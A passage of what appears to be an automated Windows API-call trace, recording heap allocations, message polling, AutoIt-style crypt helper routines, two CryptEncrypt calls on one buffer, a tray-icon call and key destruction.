(HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0197.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0197.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0197.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0197.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0197.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0197.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0197.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0197.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0197.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0197.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0197.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0197.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0197.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0197.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0197.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0197.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0197.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0197.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0197.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0197.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0197.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0197.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0197.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0197.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0197.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0197.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0197.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0197.387] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.387] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c27d8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c27d8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0197.387] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0197.387] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0197.387] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.387] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.387] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.387] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0197.387] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.388] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.388] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0197.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0197.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0197.388] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.388] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0197.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0197.388] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0197.388] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0197.388] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.388] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0197.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0197.388] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0197.388] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0197.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0197.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0197.388] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.389] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.389] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.389] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0197.389] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.389] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0197.389] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0197.407] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.407] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x7678, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x7680) returned 1 [0197.407] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 1 [0197.408] TranslateMessage (lpMsg=0x87ee3c) returned 0 [0197.408] DispatchMessageW (lpMsg=0x87ee3c) returned 0x0 [0197.408] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87e4d8) returned 1 [0197.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0197.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0197.410] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0197.410] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0197.410] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.410] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0197.410] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.410] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.410] CharLowerBuffW (in: lpsz="byte[30337]", cchLength=0xb | out: lpsz="byte[30337]") returned 0xb [0197.411] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.413] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.413] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0197.413] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0197.413] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.413] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xc00398*, pdwDataLen=0x87e820*=0x7678, dwBufLen=0x7680 | out: pbData=0xc00398*, pdwDataLen=0x87e820*=0x7680) returned 1 [0197.413] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.413] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0197.414] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.416] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.416] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.416] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.416] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0197.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0197.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0197.416] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.416] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0197.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0197.417] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0197.417] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0197.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0197.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0197.417] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.417] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0197.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0197.417] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0197.417] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0197.417] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0197.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0197.417] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.421] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.422] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0197.422] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.426] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.426] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.427] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0197.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0197.427] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0197.427] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0197.427] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0197.427] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.427] CryptDestroyKey (hKey=0x90af18) returned 1 [0197.428] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0197.428] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0197.428] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0197.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0197.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0197.428] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0197.428] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0197.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0197.428] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0197.428] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0197.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0197.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0197.428] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0197.429] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0197.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0197.429] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0197.429] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0197.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0197.429] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0197.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0197.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0197.429] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0197.429] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0197.429] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.429] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0197.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0197.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0197.429] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.429] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0197.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0197.429] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0197.429] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0197.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0197.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0197.430] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.430] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0197.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0197.430] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0197.430] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.430] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0197.430] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0197.430] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0197.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0197.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0197.430] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0197.430] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.430] 